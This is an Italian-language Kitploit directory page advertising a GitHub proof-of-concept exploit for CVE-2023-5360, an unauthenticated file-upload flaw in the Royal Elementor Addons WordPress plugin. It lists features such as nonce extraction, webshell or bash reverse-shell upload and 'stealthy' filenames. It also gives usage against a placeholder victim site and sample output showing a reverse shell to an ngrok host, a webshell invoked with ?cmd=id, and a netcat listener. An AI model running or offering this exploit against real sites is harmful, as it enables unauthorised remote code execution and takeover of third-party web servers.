Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-5360 — Royal Elementor Addons - Esecuzione di codice remoto non autenticata | Kitploit
Strumenti/GitHubGitHub/x3rx3ssec/cve-2023-5360
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration Testing
GitHubx3rx3ssec/cve-2023-5360

CVE-2023-5360

Royal Elementor Addons - Esecuzione di codice remoto non autenticata

Vedi Repository
2161 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-5360 Exploit di Upload File Elementor

Il plugin WordPress Royal Elementor Addons and Templates precedente alla versione 1.3.79 non valida correttamente i file caricati, il che potrebbe consentire a utenti non autenticati di caricare file arbitrari, come PHP, e ottenere RCE.

   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

by X3RX3S

Descrizione

Questo è un exploit proof-of-concept per CVE-2023-5360, una vulnerabilità di caricamento di file in Elementor Pro per WordPress. Consente a un attaccante non autenticato di caricare file PHP arbitrari e ottenere l'esecuzione remota di codice.

Caratteristiche

  • Recupera automaticamente il nonce di Elementor
  • Carica una semplice webshell o una reverse shell
  • Nomi file univoci per furtività
  • Helper opzionale per il listener Netcat
  • Fichissimo

Utilizzo

python3 CVE-2023-5360.py <https://victim.site/>

Esempio:

python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3RX3SSec    
      by X3RX3S aka @mindfuckerrrr


[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd

[*] Step 2: Configure payload
  [1] Simple command webshell
  [2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...

[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴‍☠️💣

Opzioni del payload:

  1. Semplice webshell a comandi (?cmd=id come in: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
  2. Reverse shell (Bash)

Dipendenze

  • Python 3.x
  • Modulo requests

Installa le dipendenze:

pip install requests

Esempio di listener

nc -lvnp 1337

Dichiarazione di non responsabilità

Questo exploit è solo per test di sicurezza educativi e autorizzati. Sei responsabile dell'uso che ne fai. Esegui test solo su sistemi di tua proprietà o per i quali hai il permesso di testarli.

Crediti

Autore: X3RX3S CVE-2023-5360

Scarica lo strumento